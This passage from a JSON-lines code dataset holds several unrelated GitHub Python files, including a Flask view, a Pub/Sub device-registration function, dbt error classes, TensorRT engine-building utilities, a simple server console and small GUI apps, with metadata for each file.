\n # Example heuristics to eat food that you are close to.\n if health[snake_id] < 30:\n food_direction = self.go_to_food_if_close(state, json)\n if food_direction:\n best_action = food_direction\n log_string = \"Went to food if close.\"\n \n\n # TO DO, add your own heuristics\n \n assert best_action in [0, 1, 2, 3], \"{} is not a valid action.\".format(best_action)\n return best_action, log_string","repo_name":"awslabs/sagemaker-battlesnake-ai","sub_path":"source/MXNetEnv/inference/inference_src/battlesnake_heuristics.py","file_name":"battlesnake_heuristics.py","file_ext":"py","file_size_in_byte":2786,"program_lang":"python","lang":"en","doc_type":"code","stars":86,"dataset":"github-code","pt":"53"}
+{"seq_id":"28447897329","text":"import datetime\n\nfrom flask import (Blueprint, redirect, url_for, current_app,\n request, flash, render_template)\n\nfrom web.extensions import db\nfrom web.utils.helpers import (randomizer)\nfrom web.utils.helpers import (render_markup)\nfrom web.index.models import (posts, technologies, solutions, Randomizer)\n\nindex = Blueprint(\"index\", __name__)\n\n@index.route('/')\ndef _index():\n conf = {\n 'title' : 'Search Engine',\n 'slogan': 'Not Google.',\n\n 'sidebar': True,\n 'footer': True,\n 'rand': randomizer(),\n 'user_level': 2,\n }\n\n markup = render_markup(\"\"\"\n# Chapter #\n\n## Section ##\n\n* Item 1\n* Item 2\n \"\"\")\n\n return render_template('index/index.html', \n conf = conf,\n solutions = solutions,\n technologies = technologies,\n posts = posts,\n m = markup,\n c = request.headers.get('CF-IPCountry'))\n\n@index.route('/plans')\ndef plans():\n conf = {\n 'title' : 'web',\n 'slogan': 'The defining IT solution.',\n\n 'sidebar': False,\n 'footer': False,\n 'rand': None,\n 'user_level': 5,\n }\n\n return render_template('index/plans.html', conf=conf)\n\n@index.route('/spider')\ndef spider():\n conf = {\n 'title' : 'web',\n 'slogan': 'The defining IT solution.',\n\n 'sidebar': False,\n 'footer': False,\n 'rand': None,\n 'user_level': 5,\n }\n\n return render_template('index/spider.html', conf=conf)","repo_name":"hoytnix/spidey","sub_path":"httpd/web/index/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"3272235643","text":"import base64\nfrom operator import sub\nfrom google.cloud import firestore\nfrom google.cloud import pubsub_v1\nimport json\n\n# Declare the project ID\nproject_id = \"niyoproject-306620\"\n\n# Connect to Firestore DB (Native Mode)\ndb = firestore.Client(project=project_id)\n# Set active collection to user\nreaders = db.collection(u'readers')\n\n# Initiate Publisher and Subscriber for PubSub\npublisher = pubsub_v1.PublisherClient()\nsubscriber = pubsub_v1.SubscriberClient()\nsubscriber_web = pubsub_v1.SubscriberClient()\n\ndef register_device(reader_id):\n # First, create an entry on Firestore\n data = {\n u'action': u'none',\n u'amount': 0\n }\n readers.document(reader_id).set(data)\n\n # Then, create a topic in PubSub with the reader_id\n topic_id = reader_id\n topic_path = publisher.topic_path(project_id, topic_id)\n if topic_path not in [topic.name for topic in publisher.list_topics(request = {'project': f'projects/{project_id}'})]:\n topic = publisher.create_topic(request={\"name\": topic_path})\n print(f'Topic {topic_path} created successfully!')\n subscription_path = subscriber.subscription_path(project_id, topic_id)\n subscription_path_web = subscriber_web.subscription_path(project_id, topic_id + \"_web\")\n if subscription_path not in [subs for subs in publisher.list_topic_subscriptions(request = {'topic': topic_path})]:\n with subscriber:\n subscription = subscriber.create_subscription(\n request = {'name': subscription_path, 'topic': topic_path, 'enable_exactly_once_delivery': True}\n )\n print(f'Subscription {subscription_path} created successfully!')\n with subscriber_web:\n subscription_web = subscriber_web.create_subscription(\n request = {'name': subscription_path_web, 'topic': topic_path, 'enable_exactly_once_delivery': True}\n )\n print(f'Subscription {subscription_path_web} created successfully!')\n else:\n print(f'Subscription {subscription_path} or {subscription_path_web} already exists, skipping!')\n else:\n print(f'Topic {topic_path} already exists, skipping!')\n \n\n\n\ndef main(event, context):\n \"\"\"Triggered from a message on a Cloud Pub/Sub topic.\n Args:\n event (dict): Event payload.\n context (google.cloud.functions.Context): Metadata for the event.\n \"\"\"\n pubsub_message = base64.b64decode(event['data']).decode('utf-8')\n data = json.loads(pubsub_message)\n\n print(\"Reader ID:\" + str(data[\"reader_id\"]))\n\n register_device(data[\"reader_id\"])\n","repo_name":"xprilion/KolPay","sub_path":"cloud_functions/register-device.py","file_name":"register-device.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"}
+{"seq_id":"9892371367","text":"import warnings\nfrom abc import ABC\nfrom typing import Any, Mapping, Optional, Sequence\n\nfrom dagster import (\n DagsterInvariantViolationError,\n Failure,\n MetadataValue,\n _check as check,\n)\n\n\nclass DagsterDbtError(Failure, ABC):\n \"\"\"The base exception of the ``dagster-dbt`` library.\"\"\"\n\n\nclass DagsterDbtCliUnexpectedOutputError(DagsterDbtError):\n \"\"\"Represents an error when parsing the output of a dbt CLI command.\"\"\"\n\n invalid_line_nos: Sequence[int]\n\n def __init__(self, invalid_line_nos: Sequence[int]):\n check.sequence_param(invalid_line_nos, \"invalid_line_nos\", int)\n line_nos_str = \", \".join(map(str, invalid_line_nos))\n description = f\"dbt CLI emitted unexpected output on lines {line_nos_str}\"\n metadata = {\n \"Invalid CLI Output Line Numbers\": MetadataValue.json({\"line_nos\": invalid_line_nos})\n }\n super().__init__(description, metadata=metadata)\n self.invalid_line_nos = invalid_line_nos\n\n\nclass DagsterDbtCliRuntimeError(DagsterDbtError, ABC):\n \"\"\"Represents an error while executing a dbt CLI command.\"\"\"\n\n def __init__(\n self,\n description: str,\n logs: Optional[Sequence[Mapping[str, Any]]] = None,\n raw_output: Optional[str] = None,\n messages: Optional[Sequence[str]] = None,\n ):\n if logs is not None:\n warnings.warn(\n \"`logs` is a deprecated argument to DagsterDbtCliRuntimeError and will be discarded\"\n )\n if raw_output is not None:\n warnings.warn(\n \"`raw_output` is a deprecated argument to DagsterDbtCliRuntimeError and will be\"\n \" discarded\"\n )\n metadata = {\"Parsed CLI Messages\": \"\\n\".join(messages or [])}\n super().__init__(description, metadata=metadata)\n\n\nclass DagsterDbtCliHandledRuntimeError(DagsterDbtCliRuntimeError):\n \"\"\"Represents a model error reported by the dbt CLI at runtime (return code 1).\"\"\"\n\n def __init__(\n self,\n logs: Optional[Sequence[Mapping[str, Any]]] = None,\n raw_output: Optional[str] = None,\n messages: Optional[Sequence[str]] = None,\n ):\n super().__init__(\"Handled error in the dbt CLI (return code 1)\", logs, raw_output, messages)\n\n\nclass DagsterDbtCliFatalRuntimeError(DagsterDbtCliRuntimeError):\n \"\"\"Represents a fatal error in the dbt CLI (return code 2).\"\"\"\n\n def __init__(\n self,\n logs: Optional[Sequence[Mapping[str, Any]]] = None,\n raw_output: Optional[str] = None,\n messages: Optional[Sequence[str]] = None,\n ):\n super().__init__(\n \"Fatal error in the dbt CLI (return code 2): \" + \" \".join(messages or []),\n logs,\n raw_output,\n messages,\n )\n\n\nclass DagsterDbtCliOutputsNotFoundError(DagsterDbtError):\n \"\"\"Represents a problem in finding the ``target/run_results.json`` artifact when executing a dbt\n CLI command.\n\n For more details on ``target/run_results.json``, see\n https://docs.getdbt.com/reference/dbt-artifacts#run_resultsjson.\n \"\"\"\n\n def __init__(self, path: str):\n super().__init__(f\"Expected to find file at path {path}\")\n\n\nclass DagsterDbtCloudJobInvariantViolationError(DagsterDbtError, DagsterInvariantViolationError):\n \"\"\"Represents an error when a dbt Cloud job is not supported by the ``dagster-dbt`` library.\"\"\"\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/libraries/dagster-dbt/dagster_dbt/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"}
+{"seq_id":"20612446391","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport logging\nimport os\nimport sys\nimport traceback\n\ntry:\n import tensorrt as trt # noqa pylint: disable=W0611 pylint: disable=W0611\n # Get TensorRT version number.\n [NV_TENSORRT_MAJOR, NV_TENSORRT_MINOR, NV_TENSORRT_PATCH, _] = [\n int(item) for item\n in trt.__version__.split(\".\")\n ]\n trt_available = True\nexcept Exception as e:\n logger = logging.getLogger(__name__)\n logger.warning(\n \"Failed to import TensorRT package, exporting TLT to a TensorRT engine \"\n \"will not be available.\"\n )\n trt_available = False\n\n\n# Default TensorRT parameters.\nDEFAULT_MAX_WORKSPACE_SIZE = 2 * (1 << 30)\nDEFAULT_MAX_BATCH_SIZE = 1\n\n\n# Define logger.\nlogger = logging.getLogger(__name__)\n\n\ndef _create_tensorrt_logger(verbose=False):\n \"\"\"Create a TensorRT logger.\n\n Args:\n verbose(bool): Flag to set logger as verbose or not.\n Return:\n tensorrt_logger(trt.infer.ConsoleLogger): TensorRT console logger object.\n \"\"\"\n if str(os.getenv('SUPPRES_VERBOSE_LOGGING', '0')) == '1':\n # Do not print any warnings in TLT docker\n trt_verbosity = trt.Logger.Severity.ERROR\n elif verbose:\n trt_verbosity = trt.Logger.INFO\n else:\n trt_verbosity = trt.Logger.WARNING\n tensorrt_logger = trt.Logger(trt_verbosity)\n return tensorrt_logger\n\n\ndef _set_excluded_layer_precision(network, fp32_layer_names, fp16_layer_names):\n \"\"\"When generating an INT8 model, it sets excluded layers' precision as fp32 or fp16.\n\n In detail, this function is only used when generating INT8 TensorRT models. It accepts\n two lists of layer names: (1). for the layers in fp32_layer_names, their precision will\n be set as fp32; (2). for those in fp16_layer_names, their precision will be set as fp16.\n\n Args:\n network: TensorRT network object.\n fp32_layer_names (list): List of layer names. These layers use fp32.\n fp16_layer_names (list): List of layer names. These layers use fp16.\n \"\"\"\n is_mixed_precision = False\n use_fp16_mode = False\n\n for i, layer in enumerate(network):\n if any(s in layer.name for s in fp32_layer_names):\n is_mixed_precision = True\n layer.precision = trt.float32\n layer.set_output_type(0, trt.float32)\n logger.info(\"fp32 index: %d; name: %s\", i, layer.name)\n elif any(s in layer.name for s in fp16_layer_names):\n is_mixed_precision = True\n use_fp16_mode = True\n layer.precision = trt.float16\n layer.set_output_type(0, trt.float16)\n logger.info(\"fp16 index: %d; name: %s\", i, layer.name)\n else:\n layer.precision = trt.int8\n layer.set_output_type(0, trt.int8)\n\n return is_mixed_precision, use_fp16_mode\n\n\nclass EngineBuilder(object):\n \"\"\"Create a TensorRT engine.\n\n Args:\n filename (list): List of filenames to load model from.\n max_batch_size (int): Maximum batch size.\n vmax_workspace_size (int): Maximum workspace size.\n dtype (str): data type ('fp32', 'fp16' or 'int8').\n calibrator (:any:`Calibrator`): Calibrator to use for INT8 optimization.\n fp32_layer_names (list): List of layer names. These layers use fp32.\n fp16_layer_names (list): List of layer names. These layers use fp16.\n verbose (bool): Whether to turn on verbose mode.\n tensor_scale_dict (dict): Dictionary mapping names to tensor scaling factors.\n strict_type(bool): Whether or not to apply strict_type_constraints for INT8 mode.\n \"\"\"\n\n def __init__(\n self,\n filenames,\n max_batch_size=DEFAULT_MAX_BATCH_SIZE,\n max_workspace_size=DEFAULT_MAX_WORKSPACE_SIZE,\n dtype=\"fp32\",\n calibrator=None,\n fp32_layer_names=None,\n fp16_layer_names=None,\n verbose=False,\n tensor_scale_dict=None,\n strict_type=False,\n ):\n \"\"\"Initialization routine.\"\"\"\n if dtype == \"int8\":\n self._dtype = trt.DataType.INT8\n elif dtype == \"fp16\":\n self._dtype = trt.DataType.HALF\n elif dtype == \"fp32\":\n self._dtype = trt.DataType.FLOAT\n else:\n raise ValueError(\"Unsupported data type: %s\" % dtype)\n self._strict_type = strict_type\n if fp32_layer_names is None:\n fp32_layer_names = []\n elif dtype != \"int8\":\n raise ValueError(\n \"FP32 layer precision could be set only when dtype is INT8\"\n )\n\n if fp16_layer_names is None:\n fp16_layer_names = []\n elif dtype != \"int8\":\n raise ValueError(\n \"FP16 layer precision could be set only when dtype is INT8\"\n )\n\n self._fp32_layer_names = fp32_layer_names\n self._fp16_layer_names = fp16_layer_names\n\n self._tensorrt_logger = _create_tensorrt_logger(verbose)\n builder = trt.Builder(self._tensorrt_logger)\n config = builder.create_builder_config()\n trt.init_libnvinfer_plugins(self._tensorrt_logger, \"\")\n if self._dtype == trt.DataType.HALF and not builder.platform_has_fast_fp16:\n logger.error(\"Specified FP16 but not supported on platform.\")\n raise AttributeError(\n \"Specified FP16 but not supported on platform.\")\n return\n\n if self._dtype == trt.DataType.INT8 and not builder.platform_has_fast_int8:\n logger.error(\"Specified INT8 but not supported on platform.\")\n raise AttributeError(\n \"Specified INT8 but not supported on platform.\")\n return\n\n if self._dtype == trt.DataType.INT8:\n if tensor_scale_dict is None and calibrator is None:\n logger.error(\"Specified INT8 but neither calibrator \"\n \"nor tensor_scale_dict is provided.\")\n raise AttributeError(\"Specified INT8 but no calibrator \"\n \"or tensor_scale_dict is provided.\")\n\n network = builder.create_network()\n\n self._load_from_files(filenames, network)\n\n builder.max_batch_size = max_batch_size\n config.max_workspace_size = max_workspace_size\n\n if self._dtype == trt.DataType.HALF:\n config.set_flag(trt.BuilderFlag.FP16)\n\n if self._dtype == trt.DataType.INT8:\n config.set_flag(trt.BuilderFlag.INT8)\n if tensor_scale_dict is None:\n config.int8_calibrator = calibrator\n # When use mixed precision, for TensorRT builder:\n # strict_type_constraints needs to be True;\n # fp16_mode needs to be True if any layer uses fp16 precision.\n set_strict_types, set_fp16_mode = \\\n _set_excluded_layer_precision(\n network=network,\n fp32_layer_names=self._fp32_layer_names,\n fp16_layer_names=self._fp16_layer_names,\n )\n if set_strict_types:\n config.set_flag(trt.BuilderFlag.STRICT_TYPES)\n if set_fp16_mode:\n config.set_flag(trt.BuilderFlag.FP16)\n else:\n # Discrete Volta GPUs don't have int8 tensor cores. So TensorRT might\n # not pick int8 implementation over fp16 or even fp32 for V100\n # GPUs found on data centers (e.g., AVDC). This will be a discrepancy\n # compared to Turing GPUs including d-GPU of DDPX and also Xavier i-GPU\n # both of which have int8 accelerators. We set the builder to strict\n # mode to avoid picking higher precision implementation even if they are\n # faster.\n if self._strict_type:\n config.set_flag(trt.BuilderFlag.STRICT_TYPES)\n else:\n config.set_flag(trt.BuilderFlag.FP16)\n self._set_tensor_dynamic_ranges(\n network=network, tensor_scale_dict=tensor_scale_dict\n )\n\n engine = builder.build_engine(network, config)\n\n try:\n assert engine\n except AssertionError:\n logger.error(\"Failed to create engine\")\n _, _, tb = sys.exc_info()\n traceback.print_tb(tb) # Fixed format\n tb_info = traceback.extract_tb(tb)\n _, line, _, text = tb_info[-1]\n raise AssertionError(\n \"Parsing failed on line {} in statement {}\".format(\n line, text)\n )\n\n self._engine = engine\n\n def _load_from_files(self, filenames, network):\n \"\"\"Load an engine from files.\"\"\"\n raise NotImplementedError()\n\n @staticmethod\n def _set_tensor_dynamic_ranges(network, tensor_scale_dict):\n \"\"\"Set the scaling factors obtained from quantization-aware training.\n\n Args:\n network: TensorRT network object.\n tensor_scale_dict (dict): Dictionary mapping names to tensor scaling factors.\n \"\"\"\n tensors_found = []\n for idx in range(network.num_inputs):\n input_tensor = network.get_input(idx)\n if input_tensor.name in tensor_scale_dict:\n tensors_found.append(input_tensor.name)\n cal_scale = tensor_scale_dict[input_tensor.name]\n input_tensor.dynamic_range = (-cal_scale, cal_scale)\n\n for layer in network:\n found_all_outputs = True\n for idx in range(layer.num_outputs):\n output_tensor = layer.get_output(idx)\n if output_tensor.name in tensor_scale_dict:\n tensors_found.append(output_tensor.name)\n cal_scale = tensor_scale_dict[output_tensor.name]\n output_tensor.dynamic_range = (-cal_scale, cal_scale)\n else:\n found_all_outputs = False\n if found_all_outputs:\n layer.precision = trt.int8\n tensors_in_dict = tensor_scale_dict.keys()\n assert set(tensors_in_dict) == set(tensors_found), (\n \"Some of the tensor names specified in tensor \"\n \"scale dictionary was not found in the network.\"\n )\n\n def get_engine(self):\n \"\"\"Return the engine that was built by the instance.\"\"\"\n return self._engine\n\n\nclass UFFEngineBuilder(EngineBuilder):\n \"\"\"Create a TensorRT engine from a UFF file.\n\n Args:\n filename (str): UFF file to create engine from.\n input_node_name (str): Name of the input node.\n input_dims (list): Dimensions of the input tensor.\n output_node_names (list): Names of the output nodes.\n \"\"\"\n\n def __init__(\n self,\n filename,\n input_node_name,\n input_dims,\n output_node_names,\n *args,\n **kwargs\n ):\n \"\"\"Init routine.\"\"\"\n self._input_node_name = input_node_name\n if not isinstance(output_node_names, list):\n output_node_names = [output_node_names]\n self._output_node_names = output_node_names\n self._input_dims = input_dims\n\n super(UFFEngineBuilder, self).__init__([filename], *args, **kwargs)\n\n def _load_from_files(self, filenames, network):\n filename = filenames[0]\n parser = trt.UffParser()\n for key, value in self._input_dims.items():\n parser.register_input(key, value, trt.UffInputOrder(0))\n for name in self._output_node_names:\n parser.register_output(name)\n try:\n assert parser.parse(filename, network, trt.DataType.FLOAT)\n except AssertionError:\n logger.error(\"Failed to parse UFF File\")\n _, _, tb = sys.exc_info()\n traceback.print_tb(tb) # Fixed format\n tb_info = traceback.extract_tb(tb)\n _, line, _, text = tb_info[-1]\n raise AssertionError(\n \"UFF parsing failed on line {} in statement {}\".format(line, text)\n )\n","repo_name":"NVIDIA/tao_tensorflow1_backend","sub_path":"nvidia_tao_tf1/cv/common/export/trt_utils.py","file_name":"trt_utils.py","file_ext":"py","file_size_in_byte":12144,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"}
+{"seq_id":"22023386358","text":"#consola del servidor (archivo de control)\n#este archivo forma parte de la estructura del servidor\n#este archivo sirve para el manejo del servidor durante la ejecucion\n\nimport sys\nimport os\n\n\n#lista de comandos\n#estos comandos no se ejecutan a la vez que el archivo del servidor\n\nrun = 'python main.py'\nlogs = 'cat logs.txt'\nhelp = 'help'\nclear = 'clear'\nmaintenance = 'python maintenance.py'\n\n \ncommands = ['run', 'logs','help', 'clear', 'maintenance']\n\nprint('Consola del servidor iniciada')\nwhile True:\n command = str(input())\n\n if command == 'run':\n \n print('')\n os.system(run)\n \n elif command == 'logs':\n \n print('')\n os.system(logs)\n \n elif command == 'help':\n \n for i in range(0, len(commands)):\n print('')\n print(commands[i])\n print('')\n \n elif command == 'clear':\n \n print('')\n os.system(clear)\n print('')\n \n elif command == 'maintenance':\n \n print('')\n #maintenance commands\n print('Lista de comandos del sistema de mantenimiento:')\n print('')\n print('-users --> Grafica del numero de usuarios')\n print('')\n \n command = str(input())\n if command == 'users':\n from maintenance import num_users\n else : \n print('Comando no valido') \n \n","repo_name":"Pachec00/Server","sub_path":"console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"8844199457","text":"\nimport math\ndef find_substring(str, pattern):\n\tunique_pattern_chars = set(pattern)\n\tfrequency_dict = {}\n\twindow_start, min_length, dict_keys, m = 0, math.inf, 0, 0\n\n\tfor window_end in range(len(str)):\n\t\tright_char = str[window_end]\n\n\t\tif right_char in unique_pattern_chars:\n\t\t\tif right_char not in frequency_dict:\n\t\t\t\tfrequency_dict[right_char] = 0\n\t\t\t\tdict_keys += 1\n\n\t\t\tfrequency_dict[right_char] += 1\n\t\t\n\t\twhile dict_keys == len(unique_pattern_chars):\n\t\t\tmin_length = min(min_length, window_end - window_start + 1)\n\n\t\t\tleft_char = str[window_start]\n\t\t\tif left_char in unique_pattern_chars:\n\t\t\t\tfrequency_dict[left_char] -= 1\n\t\t\t\tif frequency_dict[left_char] == 0:\n\t\t\t\t\tdict_keys -= 1\n\t\t\t# else:\n\t\t\twindow_start += 1\n\n\tif min_length != math.inf:\n\t\tm = window_end - window_start + 1\n\t\treturn m\n\telse:\n\t\treturn 0\n\n\ndef main():\n\tprint(find_substring(\"aabdec\", \"abc\"))\n\tprint(find_substring(\"abdabca\", \"abc\"))\n\tprint(find_substring(\"adcad\", \"abc\"))\n\nmain()","repo_name":"Rama189/Grokking-the-Coding-Interview-Patterns","sub_path":"1. Sliding window/Problem Challenge 3 - Smallest Window containing Substring (hard).py","file_name":"Problem Challenge 3 - Smallest Window containing Substring (hard).py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"26747047883","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nimport sys\nfrom PySide2.QtWidgets import (\n QApplication,\n QWidget,\n QPushButton,\n QHBoxLayout,\n QVBoxLayout,\n QListWidget,\n QAbstractItemView,\n)\n\n\nclass MainWindow(QWidget):\n def __init__(self, trp):\n super().__init__()\n self.setWindowTitle(\"Task 1\")\n self.setGeometry(370, 390, 370, 390)\n self.lst1 = QListWidget()\n self.lst1.setSelectionMode(QAbstractItemView.ExtendedSelection)\n self.lst2 = QListWidget()\n self.lst2.setSelectionMode(QAbstractItemView.ExtendedSelection)\n self.lst1.addItems(trp)\n self.inp1 = QPushButton(\"Add\")\n self.inp2 = QPushButton(\"Remove\")\n self.setting()\n\n def setting(self):\n hbox = QHBoxLayout()\n vbox = QVBoxLayout()\n hbox.addWidget(self.lst1)\n hbox.addLayout(vbox)\n vbox.addWidget(self.inp1)\n vbox.addWidget(self.inp2)\n hbox.addWidget(self.lst2)\n self.setLayout(hbox)\n self.inp1.clicked.connect(self.toright)\n self.inp2.clicked.connect(self.toleft)\n self.inp1.setStyleSheet(\"background: purple\")\n self.inp2.setStyleSheet(\"background: blue\")\n\n def toright(self):\n listItems = self.lst1.selectedItems()\n for item in listItems:\n self.lst1.takeItem(self.lst1.row(item))\n self.lst2.addItem(item)\n\n def toleft(self):\n listItems = self.lst2.selectedItems()\n for item in listItems:\n self.lst2.takeItem(self.lst2.row(item))\n self.lst1.addItem(item)\n\n\ndef main():\n app = QApplication(sys.argv)\n trp = (\n \"Apple\",\n \"Bananas\",\n \"Carrot\",\n \"Butter\",\n \"Meat\",\n \"Potato\",\n \"Pineapple\"\n )\n application = MainWindow(trp)\n application.show()\n sys.exit(app.exec_())\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Adelaide95/laba4.8-PySide2-","sub_path":"task 1.py","file_name":"task 1.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"38816295088","text":"import tkinter\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nimport tkcalendar\r\nimport sqlite3\r\nfrom tkinter import messagebox\r\nfrom PIL import ImageTk, Image\r\nimport random\r\n\r\n\r\nmaster = Tk()\r\nmaster.title('WELCOME TO GRACIOUS APARTMENTS')\r\nsW = master.winfo_screenwidth()\r\nsH = master.winfo_screenheight()\r\naW = sW - 200\r\naH = sH - 100\r\nposx = (sW/2) - (aW/2)\r\nposy = (sH/2) - (aH/2)\r\nmaster.geometry(f'{aW}x{aH}+{int(posx)}+{int(posy)}')\r\nmaster.configure(background=\"#cfe0e8\")\r\n\r\n\r\n\r\ndef expandBlueG():\r\n lbl_Introg.configure(font=(\"arial\",100,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introg.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introg.after(5000, shrinkNormal)\r\nLfrm_Gracious = LabelFrame(master, relief=\"groove\", bg=\"#ffcc5c\")\r\nLfrm_Gracious.grid(padx=100,pady=50)\r\nlbl_Introg = Label(Lfrm_Gracious, text=\"G\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introg.grid(row=1, column=3)\r\nlbl_Introg.after(3000, expandBlueG)\r\n\r\n\r\n\r\n#lbl_Intror = Label(frm_Intro, text=\"R\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=1,column=4)\r\ndef expandBlueR():\r\n lbl_Intror.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Intror.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introg.after(5000, shrinkNormal)\r\nlbl_Intror = Label(Lfrm_Gracious, text=\"R\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Intror.grid(row=1, column=4)\r\nlbl_Intror.after(4000, expandBlueR)\r\n\r\n#lbl_Introa = Label(frm_Intro, text=\"A\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=1, column=5)\r\ndef expandBlueA():\r\n lbl_Introa.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introa.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introa.after(5000, shrinkNormal)\r\nlbl_Introa = Label(Lfrm_Gracious, text=\"A\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introa.grid(row=1, column=5)\r\nlbl_Introa.after(5000, expandBlueA)\r\n\r\n#lbl_Introc = Label(frm_Intro, text=\"C\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=1, column=6)\r\ndef expandBlueC():\r\n lbl_Introc.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introc.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introc.after(5000, shrinkNormal)\r\nlbl_Introc = Label(Lfrm_Gracious, text=\"C\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introc.grid(row=1, column=6)\r\nlbl_Introc.after(6000, expandBlueC)\r\n\r\n#lbl_Introi = Label(frm_Intro, text=\"I\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=1, column=7)\r\ndef expandBlueI():\r\n lbl_Introi.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introi.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introi.after(5000, shrinkNormal)\r\nlbl_Introi = Label(Lfrm_Gracious, text=\"I\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introi.grid(row=1, column=7)\r\nlbl_Introi.after(7000, expandBlueI)\r\n\r\n#lbl_Introo = Label(frm_Intro, text=\"O\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=1, column=8)\r\ndef expandBlueO():\r\n lbl_Introo.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introo.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introo.after(5000, shrinkNormal)\r\nlbl_Introo = Label(Lfrm_Gracious, text=\"O\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introo.grid(row=1, column=8)\r\nlbl_Introo.after(8000, expandBlueO)\r\n\r\n#lbl_Introu = Label(frm_Intro, text=\"U\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=1, column=9)\r\ndef expandBlueU():\r\n lbl_Introu.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introu.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introu.after(5000, shrinkNormal)\r\nlbl_Introu = Label(Lfrm_Gracious, text=\"U\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introu.grid(row=1, column=9)\r\nlbl_Introu.after(9000, expandBlueU)\r\n\r\n#lbl_Intros = Label(frm_Intro, text=\"S\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=1, column=10)\r\ndef expandBlueS():\r\n lbl_Intros.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Intros.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Intros.after(5000, shrinkNormal)\r\nlbl_Intros = Label(Lfrm_Gracious, text=\"S\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Intros.grid(row=1, column=10)\r\nlbl_Intros.after(10000, expandBlueS)\r\n#===================================================apartments======================================================\r\n#lbl_Introap = Label(frm_Intro, text=\"A\", font=(\"times\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=2)\r\ndef expandBlueAP():\r\n lbl_Introap.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introap.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introap.after(4000, shrinkNormal)\r\nlbl_Introap = Label(Lfrm_Gracious, text=\" A\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introap.grid(row=1, column=11)\r\nlbl_Introap.after(10000, expandBlueAP)\r\n\r\n#lbl_Introp = Label(frm_Intro, text=\"P\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=3)\r\ndef expandBlueP():\r\n lbl_Introp.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introp.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introp.after(4000, shrinkNormal)\r\nlbl_Introp = Label(Lfrm_Gracious, text=\"P\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introp.grid(row=1, column=12)\r\nlbl_Introp.after(9000, 